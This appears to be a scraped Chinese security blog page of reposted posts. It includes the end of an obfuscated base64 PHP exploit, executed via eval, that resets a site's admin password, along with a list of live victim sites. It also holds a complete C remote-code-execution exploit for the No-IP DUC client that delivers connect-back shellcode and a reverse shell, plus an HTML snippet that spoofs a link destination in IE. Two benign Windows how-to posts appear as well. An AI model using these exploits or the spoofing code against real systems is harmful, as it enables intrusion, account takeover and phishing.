      "bnB3J107JHRlaGRhZGVfY2hhcnogPSBzdHJsZW4odXJsZW5jb2RlKCRuZXdfcHdkKSkgKiAyICsg".
      "Mjg7JGpva2U9IlBPU1QgIi4kX1BPU1RbIlBBVEgiXS4iYWRtaW4vY3AucGhwIEhUVFAvMS4xXHJc".
      "bkhvc3Q6ICIuJF9QT1NUWyJNU0RHTksiXS4iXHJcblVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChX".
      "aW5kb3dzOyBVOyBXaW5kb3dzIE5UIDUuMTsgZW4tVVM7IHJ2OjEuOSkgR2Vja28vMjAwODA1Mjkw".
      "NiBGaXJlZm94LzMuMFxyXG5LZWVwLUFsaXZlOiAzMDBcclxuQ29ubmVjdGlvbjoga2VlcC1hbGl2".
      "ZVxyXG5Db250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZFxyXG5D".
      "b250ZW50LUxlbmd0aDogIi4kdGVoZGFkZV9jaGFyei4iXHJcblxyXG5ucGFzcz0iLiRuZXdfcHdk".
      "LiImbnBhc3MxPSIuJG5ld19wd2QuIiZTdWJtaXQ9U3VibWl0XHJcbiI7JHJlcz0iIjskYXR0YWNr".
      "ID0gZnNvY2tvcGVuKCRfUE9TVFsiTVNER05LIl0sIjgwIiwkZXJybm8sICRlcnJzdHIsIDUwKTtp".
      "ZighJGF0dGFjayl7ZWNobygiPGJyIC8+V1RGLCBlcnIjOiAoJGVycm5vKS4kZXJyc3RyIik7cmV0".
      "dXJuO31lY2hvKCI8c3BhbiBzdHlsZT1cImZvbnQ6bm9ybWFsIDhwdCB0YWhvbWE7XCI+Jm5ic3A7".
      "Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7WytdIDxiPkNvbm5lY3RlZC4uLjxici8+PC9iPiZuYnNw".
      "OyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwO1srXSA8Yj5TZW5kaW5nIHJlcXVlc3QuLi48YnIvPjwv".
      "Yj4iKTtmd3JpdGUoJGF0dGFjaywkam9rZSk7d2hpbGUoIWZlb2YoJGF0dGFjaykpeyRyZXMuPWZn".
      "ZXRzKCRhdHRhY2spO31mY2xvc2UoJGF0dGFjayk7aWYgKHN0cmlzdHIoJHJlcywgInNhdmVkIikg".
      "fHwgc3RyaXN0cigkcmVzLCAiY2hhbmdlZCIpKXtlY2hvICImbmJzcDsmbmJzcDsmbmJzcDsmbmJz".
      "cDsmbmJzcDtbK108Yj4gRXhwbG9pdGVkICEgLCA8Zm9udCBjb2xvcj1cInJlZFwiPlBhc3N3b3Jk".
      "IGNoYW5nZWQuLi48L2I+PC9mb250PjxiciAvPiZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNw".
      "O1srXSAuLi48YnIgLz4mbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDtbK10gPGI+bmV3IHBh".
      "c3N3b3JkOjwvYj4gIi4kbmV3X3B3ZC4iPGJyIC8+Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5i".
      "c3A7WytdPGI+IGFkbWluIHBhbmVsOjwvYj4gaHR0cDovLyIuJF9QT1NUWyJNU0RHTksiXS4kX1BP".
      "U1RbIlBBVEgiXS4iYWRtaW4vPGJyIC8+PGJyIC8+PGJyIC8+PGJyIC8+PGJyIC8+PGJyIC8+PGJy".
      "IC8+PHNwYW4gc3R5bGU9XCJmb250Om5vcm1hbCA4cHQgdGFob21hO2NvbG9yOiNDQ0M7XCI+RXhw".
      "bG9pdCBCeSBHNE4wSy4uLjwvc3Bhbj4iO30gZWxzZSB7IGVjaG8gIiZuYnNwOyZuYnNwOyZuYnNw".
      "OyZuYnNwOyZuYnNwO1srXTxiPiBPb3BzICwgIHNyeSAsICA8dT5ub3QgVnVsbmVyYWJsZTwvdT4g".
      "LiAuIC4gITwvYj4iO31mbHVzaCgpO31lbHNle2VjaG8kRk9STTt9DQo=";
  eval(base64_decode($G4N0K));

/* ===[ LIVE ]===

  [»] www.xxxuploads.co.uk
  [»] www.gayphp.com
  [»] ...

  
===[ Greetz ]===

  [»] ALLAH
  [»] Tornado2800 <Tornado2800[at]gmail.com> // bedone in nemishe :D
  [»] Hussain-X <darkangel_g85[at]yahoo.com> // Jazakallah...
  [»] Str0ke //Hey Brotha keep rocking on ;)
  [»] Soudi-L0rd,Sakab...
  [»] SMN,MSD-KiD,AMD,MSN...

  Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
  ALLAH,forgimme...
 */
?>

# milw0rm.com [2008-11-17]

分类: 矩阵毒刺 标签:

No-IP DUC <= 2.1.7 Remote Code Execution Exploit

2008年11月19日 没有评论 87 views

/*
     _  __                 __  ___      __       
    | |/ /__  ____  ____  /  |/  /_  __/ /_____ _
    |   / _ \/ __ \/ __ \/ /|_/ / / / / __/ __ `/
   /   /  __/ / / / /_/ / /  / / /_/ / /_/ /_/ / 
  /_/|_\___/_/ /_/\____/_/  /_/\__,_/\__/\__,_/  

  xenomuta [ arroba ] phreaker [ punto ] net
  http://xenomuta.tuxfamily.org/ - Methylxantina 256mg

  Permlink:
  http://xenomuta.tuxfamily.org/exploits/noIPwn3r.c
  
  ** noIPwn3r **
  Exploit 0-day para el cliente DDNS noip-2.1.7 de linux 

  Vulnerable: noip2-Linux <= 2.1.7 
  probado v.s. la version pre-compilada del cliente en
  Ubuntu 7.10, Slackware 10.2 y Centos 4.5

  probablemente la version 64bits tambien es vulnerable.

  El programador confia a ciegas en la respuesta del servidor
  y plago el codigo de variables estaticas sin chequeo de size...
  Con un DNS envenenado o MITM podemos darle mambo.

  saludos a:
   4rd3b4r4n, kakata, garay, str0ke y fr1t0l4y

*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <fcntl.h>
#include <assert.h>

#define HTTP_OK "HTTP/1.1 200 OK\r\n\r\n"
#define NOIP_PORT 8245
#define u_char unsigned char

/* Offsets del shellcode x version
*  ( ubicalo aproximado con gdb, info addr buffer+32 )
*/
struct OFFSET {
  char ver[7];
  u_char offset[4];
  int padding;
} victima[] = {
  "custom", "\xff\xff\xff\xff", 162,
  "2.1.7", "\x5d\x1f\x05\x08", 162,
  "2.1.3", "\x5f\x12\x05\x08", 162,
  "2.1.1", "\xdd\x14\x05\x08", 138,
  "\x00", "\x00", 0 };


/* Una cacarita pa que rebale por si acaso */
char guineo[] =
  "\x90\x90\x90\x90\x90\x90\x90\x90" 
  "\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90" 
  "\x90\x90\x90\x90\x90\x90\x90\x90";

char shellcode[] =
// Connect-back IP:puerto - Creditos para izik de tty64.org
  "\xb0\x17\x31\xdb\xcd\x80\x6a\x66"
  "\x58\x99\x6a\x01\x5b\x52\x53\x6a"
  "\x02\x89\xe1\xcd\x80\x5b\x5d\xbe"
  "\x80\xff\xff\xfe\xf7\xd6\x56\x66"
  "\xbd\x69\x7a\x0f\xcd\x09\xdd\x55"
  "\x43\x6a\x10\x51\x50\xb0\x66\x89"
  "\xe1\xcd\x80\x87\xd9\x5b\xb0\x3f"
  "\xcd\x80\x49\x79\xf9\xb0\x0b\x52"
  "\x68\x2f\x2f\x73\x68\x68\x2f\x62"
  "\x69\x6e\x89\xe3\x52\x53\xeb\xdf";

int uso () {
 fprintf(stderr, "Uso:\n ./noIPwn3r <ip escucha> <puerto escucha> [ 0xOFFSET ]\n\n");
 fprintf(stderr, " Especifique el IP y puerto donde desea el shell reverso\n");
 fprintf(stderr, " Puede usar un Offset arbitrario,\n - ejemplo: 0x08050c20 para la version 2.1.1 compilada en Redhat con gcc 3.4.6-9\n" );
 fprintf(stderr, " Si no asigna el offset se usaran los de las versiones oficiales pre-compiladas.\n\n");
 return -1;
}

void revshell(int sock, char *ip) {
  char *buf;
  int flags, i;
  long l;
  
  buf = (char *)malloc(1024);
  
  for (i = 0; i <= sock; i++) {
    flags = fcntl(i,F_GETFL,0);
    assert(flags != -1);
    fcntl(i, F_SETFL, flags | O_NONBLOCK);    
  }
  
  while (1) {
    memset(buf, 0, 1024);
    if ((buf[0] = getchar()) > 0) {
      if ((send(sock, buf, strlen(buf), 0)) < 1) {
        break;
      }
    }

    memset(buf, 0, 1024);    
    if (recv(sock, buf, 1024, 0) > 0) { 
      write(1, buf, strlen(buf), 0);
      fflush(stdout);
      i = 1;
    } else if (i) {
      i = 0;
      printf("\nnoIPwn3r@%s$ ", ip);
      fflush(stdout);
    }
  }
  printf ("\n-= ADIOS =-\n");
  return;
}


int main (int argc, char **argv) {
  char *xploit, *ver, *hexmap;
   u_char custom[4];
  int i, v = 0, port;

  // Payola 
  printf("\n noIPwn3r - xploit para noip-2.1.x linux\n");
  printf("     _  __                 __  ___      __\n");
  printf("    | |/ /__  ____  ____  /  |/  /_  __/ /_____ _\n");
  printf("    |   / _ \\/ __ \\/ __ \\/ /|_/ / / / / __/ __ `/\n");
  printf("   /   /  __/ / / / /_/ / /  / / /_/ / /_/ /_/ / \n");
  printf("  /_/|_\\___/_/ /_/\\____/_/&nb
sp; /_/\\__,_/\\__/\\__,_/\n\n");
  printf("  http://xenomuta.tuxfamily.org - xenomuta%cphreaker.net\n\n", '@');

  if (argc < 3)
    return uso();

  memset(custom, 0, 4);
  if (argv[3]) {
    if ((strlen(argv[3]) < 10) || (strncmp(argv[3],"0x", 2)))
      return fprintf(stderr, "Offset Invalido. Utilize el formato 0x<HEX x 8>\n");

    hexmap = (char *)malloc(16);
    memset(hexmap, 0, 16);
    strcpy(hexmap, "0123456789ABCDEFabcdef");
    for (i = 2; i < 10; i++)
      if (!strchr(hexmap, argv[3][i]))
        return fprintf(stderr, "Offset Invalido. Utilize el formato 0x<HEX x 8>\n");
    for (i = 0; i < 4; i++) {
      custom[i] = (strchr(hexmap, (argv[3][8-(2*i)] >= 0x61)?argv[3][8-(2*i)] - 32:argv[3][8-(2*i)]) - hexmap) * 16;
      custom[i] += (strchr(hexmap, (argv[3][9-(2*i)] >= 0x61)?argv[3][9-(2*i)] - 32:argv[3][9-(2*i)]) - hexmap);
    }
    strncpy((char *)&victima[0].offset, (char *)&custom, 4);
  }

  port = atoi(argv[2]);
  if ((port < 0)||(port>65535))
    return fprintf(stderr, "ERROR: puerto debe ser >= 1 <= 65535\n");

  // sockets servidor / cliente
  int s, c, len = 16, on = 1;  
  struct sockaddr_in sa, ca; 

  sa.sin_addr.s_addr = 0;
  sa.sin_port = htons(NOIP_PORT);
  sa.sin_family = AF_INET;
  s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
  setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &on, sizeof(on));

  if (bind(s, (struct sockaddr *)&sa, len)) {
    fprintf(stderr, "ERROR: bind()\n");
    exit(-1);
  }
  if (listen(s, 5)) {
    fprintf(stderr, "ERROR: listen()\n");
    exit(-1);
  }
  
  // Una IP random cualquiera para forzar el cliente a hacer un update
  printf("* Esperando que pregunte cual es su IP...");
  fflush(stdout);
  c = accept(s, (struct sockaddr *)&ca, (socklen_t *)&len);
  printf("OK:\n  - Conexion desde %s:%d\n\n", inet_ntoa(ca.sin_addr), ca.sin_port);

  xploit = (char *)malloc(1024); memset(xploit, 0, 1024);
  sprintf(xploit, "%s1.2.%d.%d", HTTP_OK, ((getpid() << 16)%254), (getpid()%254));

  // Averigua la version del Cliente
  ver = (char *)malloc(1024);
  memset(ver, 0, 1024);
  recv(c, ver, 1024, 0);

  if (!(ver = strstr(ver, "/2") + 1)) {  // User-Agent: Linux-DUC/2.X.X
    close(c);
    close(s);
    return fprintf(stderr, "\nERROR: Veriosn no encontrada\n");
  }
  
  memset(ver+5, 0, 1);
  
  // Busca los offset de esta version
  for (v = 0; (!argv[3]) && strlen(victima[v].ver); v++)
    if(!strcmp(victima[v].ver, ver)) break;

  if (!victima[v].ver) {
    close(c);
    close(s);
    return fprintf(stderr, "\nERROR: Veriosn no encontrada\n");
  }

  send(c, xploit, strlen(xploit), 0);
  close(c);

  // Ahora el fuetazo   >;)
  printf("* Preparando Exploit v.s. %s @ ", ver);  
  printf("0x%02x%02x%02x%02x\n", victima[v].offset[3], victima[v].offset[2], victima[v].offset[1], victima[v].offset[0]);

  // Setea el puerto en el Shellcode
  shellcode[34] = (char )((port >> 8) & 0xff);
  shellcode[33] = (char )(port & 0xff);

  // Setea la IP de retorno en el Shellcode
  unsigned long backip = (inet_addr(argv[1]) ^ 0xffffffff);
  *(unsigned long *)(((shellcode)+24)) = (backip);

  // Prepara el HTTP reply  
  memset(xploit, 0, 1024);
  sprintf(xploit, "%s<domain =:%s%s", HTTP_OK, guineo, shellcode);

  // Completa con basura pal' relleno
  for (i = 0; i < victima[v].padding; i++)
    strcat(xploit, "\x41"); 

  // Finalmente, trukeame el %EIP
  strcat(xploit, (char *)&victima[v].offset);
  
  printf("* Esperando la conexion de update...");
  fflush(stdout);
  c = accept(s, (struct sockaddr *)&ca, (socklen_t *)&len);
  printf("OK:\n  - Conexion desde %s:%d\n\n", inet_ntoa(ca.sin_addr), ca.sin_port);
  send(c, xploit, strlen(xploit), 0);
  close(c);
  close(s);
  printf("* Exploit Enviado!!\n\n");

  sa.sin_addr.s_addr = 0;
  sa.sin_port = htons(port);
  sa.sin_family = AF_INET;
  s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
  setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &on, sizeof(on));

  if (bind(s, (struct sockaddr *)&sa, len)) {
    fprintf(stderr, "ERROR: bind()\n");
    exit(-1);
  }
  if (listen(s, 5)) {
    fprintf(stderr, "ERROR: listen()\n");
    exit(-1);
  }
  
  // Una IP random cualquiera para forzar el cliente a hacer un update
 &nb
sp;printf("* Esperando el shell en %s:%d: ", argv[1], port);
  fflush(stdout);
  c = accept(s, (struct sockaddr *)&ca, (socklen_t *)&len);
  // dup2 y NONBLOCK
  printf("OK:\n  - Conexion desde %s:%d\n\n", inet_ntoa(ca.sin_addr), ca.sin_port);
  printf("noIPwn3d!!!!\n\n", inet_ntoa(ca.sin_addr), ca.sin_port);
  revshell(c, inet_ntoa(ca.sin_addr));
  close(c);
  close(s);
}

// milw0rm.com [2008-11-18]

分类: 矩阵毒刺 标签:

用U盘就可进入有密码的Windows系统

2008年11月19日 没有评论 107 views

U盘 如今可以说非常普及了,不过,如果只是把它用来存储数据的话,也许有点可惜了。其实,我们还可以让U盘发挥更大的能量!今天小编教你一招,能让你的U盘代 替登录系统的密码,只有当你插上U盘才能正常进入系统操作,否则任何操作都无法进入系统。怎么样,是不是很有兴趣一试?
要想成功实现上述功能,我们需要借助名为Disklogon的小工具,它是一个功能强大的安全设置工具,可让我们使用优盘、软盘等移动设备来登录系统,可在登录时免于输入用户名和登录密码;而一旦移走了这些设备,系统便可以设置为自动锁定或关机。下面就来看看如何设置让优盘变成控制登录系统的“密钥盘”。
点击进入Disklogon下载页面

完成软件安装之后按要求重新启动,之后在进入系统的画面中单击“Password”按钮,然后使用键盘输入密码登录(如果之前设置了使用密码登录的话)。但我们是不希望每次都这样繁琐的,下面就来设置一下让优盘发挥更强大的功能,让它直接来控制系统登录。

直接开始菜单中单击“Disklogon Options”进入设置界面,随后依次执行如下步骤设定:

Step1:依次执行“Options/Disklogon/Disks”操作,窗口右侧中默认将所有的盘符都勾选了,但我们只希望用优盘来作为密钥盘,所以只勾选优盘的盘符(例如笔者的为L:)。

Step2:单击窗口左侧的“Options/DiskLogon/General”分支,接下来,我们要在右侧设置有优盘和无优盘时的不同操作:

1.在“Disk removal behavior”下拉列表框中选择“Lock computer when the disk is removed”(当磁盘被取出后将电脑锁定),这样当优盘被拔除后系统就自动锁定了;如果想在拔除优盘后自动注销,则可选择“Log off when the disk is removed”。

2.在“Log on to Windows”下拉列表框中选择“Log on when disk is connected”(当链接有优盘时自动登录系统),这样,如果在开机后没有连接优盘,则不能进入系统。

3.在“Unlock computer”下拉列表框中选择“Unlock computer when the disk is connected”(当连上优盘时自动解除对系统的锁定)。

小贴士:默认情况下,系统登录时,如果没有没有连接优盘,用户可点击 “Cancel”然后手工输入用户名和密码来进入系统。但为了增强安全性,去掉“Allow users to type their usename and password to log on or unlock computer”(允许用户输入用户名和密码来登录或解锁系统)选项!如此一来没有优盘插入就无法登陆系统了。

控制系统登录之 创建登录信息

Step3:完成上述设置后,我们就可以进行最后一步设置了,即登录系统解锁时所用的用户名和密码。点击进入“User Accounts”标签,随后点击“Change Logon information”区域处的“Change”按钮,进入用户名、密码创建界面(图2)。具体步骤:在“Step1”区域选择当前系统中正在使用的U 盘,接着点击“Step2”区域选择某ID号(如01),此时“Create New”将呈现可用状态,点击该按钮,并在随后的弹出窗口中输入用户名及密码即可。

如果希望用加密算法对登录信息进行加密,可勾选对话框中的“Encrypt this logon information with strong encryption algorithm”选项。添加完成后单击“close”按钮返回主窗口。

小贴士:设置了登录用户名和密码后,优盘根目录下会生成一个名为logon.dln的文件,这个文件不能删除!否则,下次重新启动时即使你插上了优盘,也会因为系统不能读取“指纹”而导致进不了系统!

至此,所有相关设置已经完成,现在你的U盘就已经是密钥盘了。在没有连接优盘的情况下根本是无法进入系统的;而在系统使用中途,如果将优盘拔除,系统便会自动锁定—单击对话框中的“Unlock”也是无效的,除非再次将优盘连接到电脑中。目前软件只支持Windows 2000/XP/2003系统。

分类: 技术文章 标签: ,

Windows更换网卡后IP地址占用的解决方法

2008年11月18日 没有评论 183 views

适用范围: Windows 2000 各版 Windows XP 各版

  问题:因为网卡坏了,所以我换了一片新的网卡,但是我要设定 IP的时候,却出现一个错误讯息,说是我所输入的IP已经指定给我旧的的网卡使用,要我设定另一个IP给我新的网卡,可是旧的网卡明明已经从计算机上拆掉了,要怎样才能彻底移除这个旧的网卡呢?我的操作系统是 Windows 2000。

  回答:在 Windows 2000 下,要利用「添加/删除硬件」的功能,来删除没有用、已经不存在的网卡。

  方法

  一: 到「控制面板」,选择「添加/删除硬件」,进入添加/删除硬件之后,照画面指示按「下一步」,选择「删除安装」 按下一步,选择「删除安装装置」,按「下一步」接着会出现装置清单,在清单中找看看有没有你的旧的网卡(记得要勾起显示隐藏的装置那个选项),有的话,选了之后按下一步照画面指示动作进行。 如果在这里仍然看不到你已经拆掉的那张网卡,请继续方法二。

  二: 按开始,到执行,输入 cmd 按确定(以便快速进入命令模式,注二) 输入以下指令后,按 ENTER 键,这是让装置管理员显示已安装但是目前不在机器上的装置。。 set devmgr_show_nonpresent_devices=1 这个设定,是设定一个环境变量,有了这个环境变量(devmgr_show_nonpresent_devices),装置管理员就可以去显示已经安装的设备,而这个设备是目前并不在机器上的东西。因为这是在 command 模式下利用 SET 建立的环境变量,只是暂时的,所以只对此次有效,下次开机就会从内存消失,因此你不用担心如此的设定会无法恢复原状的问题。输入 start devmgmt.msc,这是启动装置管理员的意思。 到「检视」,选「显示隐藏装置」 展开「网络适配卡」这一项,去找你之前移除的网卡,找到之后,在其上按鼠标右键选「删除安装」。

  注一: 这个错误讯息的详细内容大致如下: 您输入的网络适配卡 IP 地址 xxx.xxx.xxx.xxx 已经指派给另一个适配卡 ABCD,ABCD 在 [ 网络和拨号联机 ] 中被隐藏起来,因为他在计算机中不是实体适配卡,或者他是旧版而未运作的适配卡,而且这两个适配卡同时都在使用中,只有其中一个可以使用这个地址。这样可能会造成不正确的系统设定。您想要在进阶的对话方 IP 地址清单中输入另一个 IP 地址给这个适配卡使用吗? 「是」「否」   注二: 所以在这里,我们又可以学到一样技巧,就是进入 Command Mode 最省事的方法,就是在「执行」中输入「cmd」,你不用再去「开始」>>「程序」>>「附件」>>「命令提示字符」那么麻烦的去执行了。 cmd 这命令在 Windows NT、2000、XP 都适用,Windows 95、98、Me 请改为 command。 Trotter的方法: 在“设备管理器”中,点“查看”,点“显示隐藏的设备”,在网络适配器中删除掉隐藏的网络适配器即可。

分类: 技术文章 标签:

IE最新的欺骗代码

2008年11月18日 没有评论 67 views

<p><a id="SPOOF" href="http://xnima.cn"></a></p>
<div>
<a href="http://www.163.com" target="_blank">
<table>
<caption>
<label for="SPOOF">
<u style="cursor: pointer; color: blue">
www.163.com
</u>
</label>
</caption>
</table>
</a>
</div>

分类: 技术文章 标签: